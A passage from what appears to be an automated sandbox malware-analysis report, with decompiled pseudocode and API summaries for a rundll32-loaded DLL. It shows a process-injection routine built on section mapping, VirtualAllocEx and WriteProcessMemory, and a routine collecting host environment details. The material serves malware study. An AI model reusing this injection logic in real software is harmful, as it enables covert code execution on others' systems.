                                                                                                                                                                                                                				char _v6;
                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                				void* _v12;
                                                                                                                                                                                                                				void* _v16;
                                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                                				void* _v24;
                                                                                                                                                                                                                				long _v28;
                                                                                                                                                                                                                				long _v32;
                                                                                                                                                                                                                				intOrPtr _v36;
                                                                                                                                                                                                                				void* _v37;
                                                                                                                                                                                                                				intOrPtr _v40;
                                                                                                                                                                                                                				char _v44;
                                                                                                                                                                                                                				short _v52;
                                                                                                                                                                                                                				long _v56;
                                                                                                                                                                                                                				void* _v60;
                                                                                                                                                                                                                				struct _WNDCLASSEXA _v108;
                                                                                                                                                                                                                				void* _t83;
                                                                                                                                                                                                                				intOrPtr _t87;
                                                                                                                                                                                                                				intOrPtr _t90;
                                                                                                                                                                                                                				char _t97;
                                                                                                                                                                                                                				char _t98;
                                                                                                                                                                                                                				intOrPtr _t105;
                                                                                                                                                                                                                				long _t107;
                                                                                                                                                                                                                				char _t112;
                                                                                                                                                                                                                				void* _t119;
                                                                                                                                                                                                                				char _t120;
                                                                                                                                                                                                                				void* _t124;
                                                                                                                                                                                                                				struct HWND__* _t133;
                                                                                                                                                                                                                				void* _t139;
                                                                                                                                                                                                                				void* _t148;
                                                                                                                                                                                                                				intOrPtr* _t154;
                                                                                                                                                                                                                				intOrPtr _t157;
                                                                                                                                                                                                                				void* _t158;
                                                                                                                                                                                                                				void* _t162;
                                                                                                                                                                                                                				void* _t164;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t83 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                				_t139 = 0;
                                                                                                                                                                                                                				_v16 = __ecx;
                                                                                                                                                                                                                				_t157 = __edx;
                                                                                                                                                                                                                				_v24 = 0;
                                                                                                                                                                                                                				_v60 = 0;
                                                                                                                                                                                                                				_v56 = 0;
                                                                                                                                                                                                                				_v20 = 0;
                                                                                                                                                                                                                				_v12 = 0;
                                                                                                                                                                                                                				_v28 = 0;
                                                                                                                                                                                                                				_v36 = __edx;
                                                                                                                                                                                                                				if(( *(_t83 + 0x1898) & 0x00000040) != 0) {
                                                                                                                                                                                                                					E1000E9DF(0x1f4);
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t12 = _t157 + 0x3c; // 0x108
                                                                                                                                                                                                                				_t154 =  *_t12 + _t157;
                                                                                                                                                                                                                				_v32 = _t139;
                                                                                                                                                                                                                				if( *_t154 != 0x4550) {
                                                                                                                                                                                                                					L14:
                                                                                                                                                                                                                					_t158 = _v16;
                                                                                                                                                                                                                					L15:
                                                                                                                                                                                                                					if(_v12 != _t139) {
                                                                                                                                                                                                                						_t90 =  *0x10020e70; // 0x4751868
                                                                                                                                                                                                                						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v12);
                                                                                                                                                                                                                						_v12 = _t139;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					L17:
                                                                                                                                                                                                                					if(_v20 != 0) {
                                                                                                                                                                                                                						_t87 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x130))(), _v20);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					if(_v24 != 0) {
                                                                                                                                                                                                                						NtClose(_v24);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					return _v12;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_v60 =  *((intOrPtr*)(_t154 + 0x50));
                                                                                                                                                                                                                				if(NtCreateSection( &_v24, 0xe, _t139,  &_v60, 0x40, 0x8000000, _t139) < 0) {
                                                                                                                                                                                                                					goto L14;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t97 =  *((intOrPtr*)("15")); // 0x3531
                                                                                                                                                                                                                				_v8 = _t97;
                                                                                                                                                                                                                				_t98 =  *0x1001dee2; // 0x0
                                                                                                                                                                                                                				_v6 = _t98;
                                                                                                                                                                                                                				_v108.lpszClassName =  &_v44;
                                                                                                                                                                                                                				_v108.lpfnWndProc = DefWindowProcW;
                                                                                                                                                                                                                				_v44 = 0x74636573;
                                                                                                                                                                                                                				_v40 = 0x6e6f69;
                                                                                                                                                                                                                				_v108.cbWndExtra = _t139;
                                                                                                                                                                                                                				_v108.style = 0xb;
                                                                                                                                                                                                                				_v108.lpszMenuName = _t139;
                                                                                                                                                                                                                				_v108.cbSize = 0x30;
                                                                                                                                                                                                                				_v108.cbClsExtra = _t139;
                                                                                                                                                                                                                				_v108.hInstance = _t139;
                                                                                                                                                                                                                				if(RegisterClassExA( &_v108) != 0) {
                                                                                                                                                                                                                					_t34 =  &_v44; // 0x74636573
                                                                                                                                                                                                                					_t133 = CreateWindowExA(_t139, _t34,  &_v8, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t139, _t139, _t139, _t139); // executed
                                                                                                                                                                                                                					if(_t133 != 0) {
                                                                                                                                                                                                                						DestroyWindow(_t133); // executed
                                                                                                                                                                                                                						_t35 =  &_v44; // 0x74636573
                                                                                                                                                                                                                						UnregisterClassA(_t35, _t139);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				_t105 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                				_t107 = NtMapViewOfSection(_v24,  *((intOrPtr*)(_t105 + 0x130))(),  &_v20, _t139, _t139, _t139,  &_v28, 2, _t139, 0x40);
                                                                                                                                                                                                                				_t158 = _v16;
                                                                                                                                                                                                                				if(_t107 < 0 || NtMapViewOfSection(_v24, _t158,  &_v12, _t139, _t139, _t139,  &_v28, 2, _t139, 0x40) < 0) {
                                                                                                                                                                                                                					goto L15;
                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                					_t112 = E1000958A( *0x10020d88, 0x1ac4);
                                                                                                                                                                                                                					_v8 = _t112;
                                                                                                                                                                                                                					if(_t112 == 0) {
                                                                                                                                                                                                                						goto L15;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					 *((intOrPtr*)(_t112 + 0x224)) = _v12;
                                                                                                                                                                                                                					_t162 = VirtualAllocEx(_t158, _t139, 0x1ac4, 0x1000, 4);
                                                                                                                                                                                                                					WriteProcessMemory(_v16, _t162, _v8, 0x1ac4,  &_v32);
                                                                                                                                                                                                                					E1000953B( &_v8, 0x1ac4);
                                                                                                                                                                                                                					_t119 =  *0x10020d60; // 0x10000000
                                                                                                                                                                                                                					_v16 = _t119;
                                                                                                                                                                                                                					_t120 =  *0x10020d88; // 0x474fc98
                                                                                                                                                                                                                					 *0x10020d88 = _t162;
                                                                                                                                                                                                                					_v8 = _t120;
                                                                                                                                                                                                                					 *0x10020d60 = _v12;
                                                                                                                                                                                                                					E10009602(_v20, _v36,  *((intOrPtr*)(_t154 + 0x50)));
                                                                                                                                                                                                                					E1000A427(_v20, _v12, _v36);
                                                                                                                                                                                                                					_t124 = E1000D389("Jjischug");
                                                                                                                                                                                                                					_v37 = _t139;
                                                                                                                                                                                                                					_t148 = 0xf;
                                                                                                                                                                                                                					if(_t124 > _t148) {
                                                                                                                                                                                                                						do {
                                                                                                                                                                                                                							L12:
                                                                                                                                                                                                                							_t64 = _t139 + 0x41; // 0x41
                                                                                                                                                                                                                							 *((char*)(_t164 + _t139 - 0x30)) = _t64;
                                                                                                                                                                                                                							_t139 = _t139 + 1;
                                                                                                                                                                                                                						} while (_t139 < _t148);
                                                                                                                                                                                                                						L13:
                                                                                                                                                                                                                						lstrlenW( &_v52);
                                                                                                                                                                                                                						 *0x10020d60 = _v16;
                                                                                                                                                                                                                						 *0x10020d88 = _v8;
                                                                                                                                                                                                                						goto L17;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t148 = _t124;
                                                                                                                                                                                                                					if(_t148 == 0) {
                                                                                                                                                                                                                						goto L13;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					goto L12;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                			}






































                                                                                                                                                                                                                0x1000a4ae
                                                                                                                                                                                                                0x1000a4b4
                                                                                                                                                                                                                0x1000a4b6
                                                                                                                                                                                                                0x1000a4ba
                                                                                                                                                                                                                0x1000a4bc
                                                                                                                                                                                                                0x1000a4bf
                                                                                                                                                                                                                0x1000a4c2
                                                                                                                                                                                                                0x1000a4c5
                                                                                                                                                                                                                0x1000a4c8
                                                                                                                                                                                                                0x1000a4cb
                                                                                                                                                                                                                0x1000a4d6
                                                                                                                                                                                                                0x1000a4d9
                                                                                                                                                                                                                0x1000a4e0
                                                                                                                                                                                                                0x1000a4e0
                                                                                                                                                                                                                0x1000a4e5
                                                                                                                                                                                                                0x1000a4e8
                                                                                                                                                                                                                0x1000a4ea
                                                                                                                                                                                                                0x1000a4f3
                                                                                                                                                                                                                0x1000a6f0
                                                                                                                                                                                                                0x1000a6f0
                                                                                                                                                                                                                0x1000a6f3
                                                                                                                                                                                                                0x1000a6f6
                                                                                                                                                                                                                0x1000a6fb
                                                                                                                                                                                                                0x1000a701
                                                                                                                                                                                                                0x1000a704
                                                                                                                                                                                                                0x1000a704
                                                                                                                                                                                                                0x1000a707
                                                                                                                                                                                                                0x1000a70b
                                                                                                                                                                                                                0x1000a70d
                                                                                                                                                                                                                0x1000a722
                                                                                                                                                                                                                0x1000a722
                                                                                                                                                                                                                0x1000a72c
                                                                                                                                                                                                                0x1000a736
                                                                                                                                                                                                                0x1000a736
                                                                                                                                                                                                                0x1000a73d
                                                                                                                                                                                                                0x1000a73d
                                                                                                                                                                                                                0x1000a502
                                                                                                                                                                                                                0x1000a51c
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a522
                                                                                                                                                                                                                0x1000a528
                                                                                                                                                                                                                0x1000a52c
                                                                                                                                                                                                                0x1000a531
                                                                                                                                                                                                                0x1000a537
                                                                                                                                                                                                                0x1000a53f
                                                                                                                                                                                                                0x1000a546
                                                                                                                                                                                                                0x1000a54d
                                                                                                                                                                                                                0x1000a554
                                                                                                                                                                                                                0x1000a557
                                                                                                                                                                                                                0x1000a55e
                                                                                                                                                                                                                0x1000a561
                                                                                                                                                                                                                0x1000a568
                                                                                                                                                                                                                0x1000a56b
                                                                                                                                                                                                                0x1000a577
                                                                                                                                                                                                                0x1000a594
                                                                                                                                                                                                                0x1000a599
                                                                                                                                                                                                                0x1000a5a1
                                                                                                                                                                                                                0x1000a5a4
                                                                                                                                                                                                                0x1000a5ab
                                                                                                                                                                                                                0x1000a5af
                                                                                                                                                                                                                0x1000a5af
                                                                                                                                                                                                                0x1000a5a1
                                                                                                                                                                                                                0x1000a5cb
                                                                                                                                                                                                                0x1000a5da
                                                                                                                                                                                                                0x1000a5dd
                                                                                                                                                                                                                0x1000a5e2
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a60c
                                                                                                                                                                                                                0x1000a617
                                                                                                                                                                                                                0x1000a61c
                                                                                                                                                                                                                0x1000a623
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a638
                                                                                                                                                                                                                0x1000a64b
                                                                                                                                                                                                                0x1000a661
                                                                                                                                                                                                                0x1000a66d
                                                                                                                                                                                                                0x1000a672
                                                                                                                                                                                                                0x1000a677
                                                                                                                                                                                                                0x1000a67a
                                                                                                                                                                                                                0x1000a67f
                                                                                                                                                                                                                0x1000a68f
                                                                                                                                                                                                                0x1000a695
                                                                                                                                                                                                                0x1000a69a
                                                                                                                                                                                                                0x1000a6a6
                                                                                                                                                                                                                0x1000a6b0
                                                                                                                                                                                                                0x1000a6b8
                                                                                                                                                                                                                0x1000a6bd
                                                                                                                                                                                                                0x1000a6c0
                                                                                                                                                                                                                0x1000a6c8
                                                                                                                                                                                                                0x1000a6c8
                                                                                                                                                                                                                0x1000a6c8
                                                                                                                                                                                                                0x1000a6cb
                                                                                                                                                                                                                0x1000a6cf
                                                                                                                                                                                                                0x1000a6d0
                                                                                                                                                                                                                0x1000a6d4
                                                                                                                                                                                                                0x1000a6d8
                                                                                                                                                                                                                0x1000a6e1
                                                                                                                                                                                                                0x1000a6e9
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a6e9
                                                                                                                                                                                                                0x1000a6c2
                                                                                                                                                                                                                0x1000a6c6
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                0x1000a6c6

                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • NtCreateSection.6153A066(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 1000A517
                                                                                                                                                                                                                • RegisterClassExA.USER32(?), ref: 1000A56E
                                                                                                                                                                                                                • CreateWindowExA.USER32(00000000,section,00000001,00CF0000,80000000,80000000,000001F4,00000064,00000000,00000000,00000000,00000000), ref: 1000A599
                                                                                                                                                                                                                • DestroyWindow.USER32(00000000), ref: 1000A5A4
                                                                                                                                                                                                                • UnregisterClassA.USER32(section,00000000), ref: 1000A5AF
                                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,00000000), ref: 1000A5DA
                                                                                                                                                                                                                • NtMapViewOfSection.NTDLL(?,?,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 1000A601
                                                                                                                                                                                                                • VirtualAllocEx.KERNELBASE(?,00000000,00001AC4,00001000,00000004), ref: 1000A645
                                                                                                                                                                                                                • WriteProcessMemory.KERNELBASE(?,00000000,00000001,00001AC4,?), ref: 1000A661
                                                                                                                                                                                                                  • Part of subcall function 1000953B: HeapFree.KERNEL32(00000000,00000000), ref: 10009581
                                                                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 1000A6D8
                                                                                                                                                                                                                • NtUnmapViewOfSection.NTDLL(00000000), ref: 1000A722
                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 1000A736
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 0000000D.00000002.5727312172.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727281860.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727452661.000000001001A000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727497896.000000001001F000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                • Associated: 0000000D.00000002.5727528413.0000000010021000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_13_2_10000000_rundll32.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
                                                                                                                                                                                                                • String ID: 0$Jjischug$section
                                                                                                                                                                                                                • API String ID: 494031690-3280373849
                                                                                                                                                                                                                • Opcode ID: 9a737af273db41b1fde892004d7383aa949273c8ddf4d36099d85bddc829d53d
                                                                                                                                                                                                                • Instruction ID: b5f4344525c8211231c04cd401d06040389fe4c66827731468beb840fcedfec4
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a737af273db41b1fde892004d7383aa949273c8ddf4d36099d85bddc829d53d
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8D8118B5A01219EFEB00DFD4CC84AEEBBB9FF09344F14416AF505A7261D771AA81CB60
                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                                			E1000B231(void* __edx, void* __fp0) {
                                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                                				char _v12;
                                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                                				char _v144;
                                                                                                                                                                                                                				char _v656;
                                                                                                                                                                                                                				char _v668;
                                                                                                                                                                                                                				char _v2644;
                                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                                				struct _OSVERSIONINFOA* _t69;
                                                                                                                                                                                                                				intOrPtr _t71;
                                                                                                                                                                                                                				void* _t72;
                                                                                                                                                                                                                				intOrPtr _t74;
                                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                                				intOrPtr* _t78;
                                                                                                                                                                                                                				intOrPtr _t80;
                                                                                                                                                                                                                				intOrPtr _t81;
                                                                                                                                                                                                                				intOrPtr _t82;
                                                                                                                                                                                                                				intOrPtr _t88;
                                                                                                                                                                                                                				intOrPtr _t90;
                                                                                                                                                                                                                				void* _t91;
                                                                                                                                                                                                                				intOrPtr _t93;
                                                                                                                                                                                                                				intOrPtr _t94;
                                                                                                                                                                                                                				void* _t95;
                                                                                                                                                                                                                				void* _t99;
                                                                                                                                                                                                                				intOrPtr _t101;
                                                                                                                                                                                                                				intOrPtr _t103;
                                                                                                                                                                                                                				short _t108;
                                                                                                                                                                                                                				char _t110;
                                                                                                                                                                                                                				intOrPtr _t115;
                                                                                                                                                                                                                				intOrPtr _t118;
                                                                                                                                                                                                                				intOrPtr _t121;
                                                                                                                                                                                                                				intOrPtr _t125;
                                                                                                                                                                                                                				intOrPtr _t136;
                                                                                                                                                                                                                				intOrPtr _t138;
                                                                                                                                                                                                                				intOrPtr _t140;
                                                                                                                                                                                                                				intOrPtr _t143;
                                                                                                                                                                                                                				intOrPtr _t145;
                                                                                                                                                                                                                				intOrPtr _t151;
                                                                                                                                                                                                                				void* _t152;
                                                                                                                                                                                                                				WCHAR* _t153;
                                                                                                                                                                                                                				char* _t154;
                                                                                                                                                                                                                				intOrPtr _t165;
                                                                                                                                                                                                                				intOrPtr _t180;
                                                                                                                                                                                                                				void* _t196;
                                                                                                                                                                                                                				struct _OSVERSIONINFOA* _t197;
                                                                                                                                                                                                                				void* _t198;
                                                                                                                                                                                                                				void* _t200;
                                                                                                                                                                                                                				char _t203;
                                                                                                                                                                                                                				void* _t204;
                                                                                                                                                                                                                				char* _t205;
                                                                                                                                                                                                                				void* _t208;
                                                                                                                                                                                                                				int* _t209;
                                                                                                                                                                                                                				void* _t222;
                                                                                                                                                                                                                
                                                                                                                                                                                                                				_t222 = __fp0;
                                                                                                                                                                                                                				_t151 =  *0x10020d60; // 0x10000000
                                                                                                                                                                                                                				_t69 = E10009525(0x1ac4);
                                                                                                                                                                                                                				_t197 = _t69;
                                                                                                                                                                                                                				if(_t197 != 0) {
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x1640)) = GetCurrentProcessId();
                                                                                                                                                                                                                					_t71 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_t72 =  *((intOrPtr*)(_t71 + 0xb0))(_t198);
                                                                                                                                                                                                                					_t3 = _t197 + 0x648; // 0x648
                                                                                                                                                                                                                					E100151C2( *((intOrPtr*)(_t197 + 0x1640)) + _t72, _t3);
                                                                                                                                                                                                                					_t74 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_t5 = _t197 + 0x1644; // 0x1644
                                                                                                                                                                                                                					_t199 = _t5;
                                                                                                                                                                                                                					_t75 =  *((intOrPtr*)(_t74 + 0x12c))(0, _t5, 0x105);
                                                                                                                                                                                                                					_t212 = _t75;
                                                                                                                                                                                                                					if(_t75 != 0) {
                                                                                                                                                                                                                						 *((intOrPtr*)(_t197 + 0x1854)) = E10009961(_t199, _t212);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t76 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_t78 = E1000E500( *((intOrPtr*)(_t76 + 0x130))()); // executed
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x110)) = _t78;
                                                                                                                                                                                                                					_t162 =  *_t78;
                                                                                                                                                                                                                					if(E1000E67B( *_t78) == 0) {
                                                                                                                                                                                                                						_t80 = E1000E550(_t162, _t199); // executed
                                                                                                                                                                                                                						__eflags = _t80;
                                                                                                                                                                                                                						_t165 = (0 | _t80 > 0x00000000) + 1;
                                                                                                                                                                                                                						__eflags = _t165;
                                                                                                                                                                                                                						 *((intOrPtr*)(_t197 + 0x214)) = _t165;
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						 *((intOrPtr*)(_t197 + 0x214)) = 3;
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t14 = _t197 + 0x220; // 0x220, executed
                                                                                                                                                                                                                					_t81 = E1000EE8D(_t14); // executed
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x218)) = _t81;
                                                                                                                                                                                                                					_t82 = E1000EE52(_t14); // executed
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x21c)) = _t82;
                                                                                                                                                                                                                					_t17 = _t197 + 0x114; // 0x114
                                                                                                                                                                                                                					_t200 = _t17;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x224)) = _t151;
                                                                                                                                                                                                                					_push( &_v16);
                                                                                                                                                                                                                					_v12 = 0x80;
                                                                                                                                                                                                                					_push( &_v8);
                                                                                                                                                                                                                					_v8 = 0x100;
                                                                                                                                                                                                                					_push( &_v656);
                                                                                                                                                                                                                					_push( &_v12);
                                                                                                                                                                                                                					_push(_t200);
                                                                                                                                                                                                                					_push( *((intOrPtr*)( *((intOrPtr*)(_t197 + 0x110)))));
                                                                                                                                                                                                                					_t88 =  *0x10020d78; // 0x474fb48
                                                                                                                                                                                                                					_push(0); // executed
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t88 + 0x6c))() == 0) {
                                                                                                                                                                                                                						GetLastError();
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t90 =  *0x10020d50; // 0x474fa80
                                                                                                                                                                                                                					_t91 =  *((intOrPtr*)(_t90 + 0x3c))(0x1000);
                                                                                                                                                                                                                					_t28 = _t197 + 0x228; // 0x228
                                                                                                                                                                                                                					_t152 = _t28;
                                                                                                                                                                                                                					 *(_t197 + 0x1850) = 0 | _t91 > 0x00000000;
                                                                                                                                                                                                                					if( *0x10020d5c != 2) {
                                                                                                                                                                                                                						E1000B18D(_t152);
                                                                                                                                                                                                                					} else {
                                                                                                                                                                                                                						E1000B194(_t152);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t93 =  *0x10020d5c; // 0x1
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0xa0)) = _t93;
                                                                                                                                                                                                                					_t217 = _t152;
                                                                                                                                                                                                                					if(_t152 != 0) {
                                                                                                                                                                                                                						 *((intOrPtr*)(_t197 + 0x434)) = E10009961(_t152, _t217);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_t94 = E1000D7B0();
                                                                                                                                                                                                                					_t34 = _t197 + 0xb0; // 0xb0
                                                                                                                                                                                                                					_t201 = _t34;
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0xac)) = _t94;
                                                                                                                                                                                                                					_t95 = E1000D5A6(_t94, _t34, _t217, _t222);
                                                                                                                                                                                                                					_t36 = _t197 + 0xd0; // 0xd0
                                                                                                                                                                                                                					E10009D4D(_t95, _t34, _t36);
                                                                                                                                                                                                                					_t37 = _t197 + 0x438; // 0x438
                                                                                                                                                                                                                					E1000997B(_t152, _t37);
                                                                                                                                                                                                                					_t99 = E1000EEEC(_t201, E1000D389(_t34), 0);
                                                                                                                                                                                                                					_t38 = _t197 + 0x100c; // 0x100c
                                                                                                                                                                                                                					E1000D7C6(_t99, _t38, _t222);
                                                                                                                                                                                                                					_t101 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_t103 = E1000E6CD( *((intOrPtr*)(_t101 + 0x130))(_t200)); // executed
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x101c)) = _t103;
                                                                                                                                                                                                                					E100096BF(_t197, 0, 0x9c);
                                                                                                                                                                                                                					_t209 = _t208 + 0xc;
                                                                                                                                                                                                                					_t197->dwOSVersionInfoSize = 0x9c;
                                                                                                                                                                                                                					GetVersionExA(_t197);
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0xa8)) = E1000AF90(_t102);
                                                                                                                                                                                                                					_t108 = E1000AFB9(_t107);
                                                                                                                                                                                                                					_t42 = _t197 + 0x1020; // 0x1020
                                                                                                                                                                                                                					_t153 = _t42;
                                                                                                                                                                                                                					 *((short*)(_t197 + 0x9c)) = _t108;
                                                                                                                                                                                                                					GetWindowsDirectoryW(_t153, 0x104);
                                                                                                                                                                                                                					_t110 = E1000948D(_t107, 0x11cb);
                                                                                                                                                                                                                					_t180 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_t203 = _t110;
                                                                                                                                                                                                                					 *_t209 = 0x104;
                                                                                                                                                                                                                					_push( &_v668);
                                                                                                                                                                                                                					_push(_t203);
                                                                                                                                                                                                                					_v8 = _t203;
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t180 + 0xf0))() == 0) {
                                                                                                                                                                                                                						_t145 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						 *((intOrPtr*)(_t145 + 0x10c))(_t203, _t153);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					E1000A291( &_v8);
                                                                                                                                                                                                                					_t115 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_t49 = _t197 + 0x1434; // 0x1434
                                                                                                                                                                                                                					_t204 = _t49;
                                                                                                                                                                                                                					 *_t209 = 0x209;
                                                                                                                                                                                                                					_push(_t204);
                                                                                                                                                                                                                					_push(L"USERPROFILE");
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t115 + 0xf0))() == 0) {
                                                                                                                                                                                                                						E1000B76A(_t204, 0x105, L"%s\\%s", _t153);
                                                                                                                                                                                                                						_t143 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						_t209 =  &(_t209[5]);
                                                                                                                                                                                                                						 *((intOrPtr*)(_t143 + 0x10c))(L"USERPROFILE", _t204, "TEMP");
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_push(0x20a);
                                                                                                                                                                                                                					_t52 = _t197 + 0x122a; // 0x122a
                                                                                                                                                                                                                					_t154 = L"TEMP";
                                                                                                                                                                                                                					_t118 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_push(_t154);
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t118 + 0xf0))() == 0) {
                                                                                                                                                                                                                						_t140 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						 *((intOrPtr*)(_t140 + 0x10c))(_t154, _t204);
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_push(0x40);
                                                                                                                                                                                                                					_t205 = L"SystemDrive";
                                                                                                                                                                                                                					_push( &_v144);
                                                                                                                                                                                                                					_t121 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					_push(_t205);
                                                                                                                                                                                                                					if( *((intOrPtr*)(_t121 + 0xf0))() == 0) {
                                                                                                                                                                                                                						_t138 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                						 *((intOrPtr*)(_t138 + 0x10c))(_t205, L"C:");
                                                                                                                                                                                                                					}
                                                                                                                                                                                                                					_v8 = 0x7f;
                                                                                                                                                                                                                					_t60 = _t197 + 0x199c; // 0x199c
                                                                                                                                                                                                                					_t125 =  *0x10020d58; // 0x474f900
                                                                                                                                                                                                                					 *((intOrPtr*)(_t125 + 0xc0))(_t60,  &_v8);
                                                                                                                                                                                                                					_t63 = _t197 + 0x100c; // 0x100c
                                                                                                                                                                                                                					E100151C2(E1000EEEC(_t63, E1000D389(_t63), 0),  &_v2644);
                                                                                                                                                                                                                					_t64 = _t197 + 0x1858; // 0x1858
                                                                                                                                                                                                                					E10015194( &_v2644, _t64, 0x20);
                                                                                                                                                                                                                					_push( &_v2644);
                                                                                                                                                                                                                					_push(0x1e);
                                                                                                                                                                                                                					_t67 = _t197 + 0x1878; // 0x1878
                                                                                                                                                                                                                					_t196 = 0x14;
                                                                                                                                                                                                                					E10009A48(_t67, _t196);
                                                                                                                                                                                                                					_t136 = E1000AC45(_t196); // executed
                                                                                                                                                                                                                					 *((intOrPtr*)(_t197 + 0x1898)) = _t136;
                                                                                                                                                                                                                					return _t197;
                                                                                                                                                                                                                				}
                                                                                                                                                                                                                				return _t69;
                                                                                                                                                                                                                			}

























































                                                                                                                                                                                                                0x1000b231
                                                                                                                                                                                                                0x1000b23b
                                                                                                                                                                                                                0x1000b247
                                                                                                                                                                                                                0x1000b24c
                                                                                                                                                                                                                0x1000b251
                                                                                                                                                                                                                0x1000b25e
                                                                                                                                                                                                                0x1000b264
                                                                                                                                                                                                                0x1000b269
                                                                                                                                                                                                                0x1000b26f
                                                                                                                                                                                                                0x1000b27f
                                                                                                                                                                                                                0x1000b284
                                                                                                                                                                                                                0x1000b289
                                                                                                                                                                                                                0x1000b289
                                                                                                                                                                                                                0x1000b299
                                                                                                                                                                                                                0x1000b29f
                                                                                                                                                                                                                0x1000b2a1
                                                                                                                                                                                                                0x1000b2aa
                                                                                                                                                                                                                0x1000b2aa
                                                                                                                                                                                                                0x1000b2b0
                                                                                                                                                                                                                0x1000b2bd
                                                                                                                                                                                                                0x1000b2c2
                                                                                                                                                                                                                0x1000b2c8
                                                                                                                                                                                                                0x1000b2d1
                                                                                                                                                                                                                0x1000b2df
                                                                                                                                                                                                                0x1000b2e6
                                                                                                                                                                                                                0x1000b2eb
                                                                                                                                                                                                                0x1000b2eb
                                                                                                                                                                                                                0x1000b2ec
                                                                                                                                                                                                                0x1000b2d3
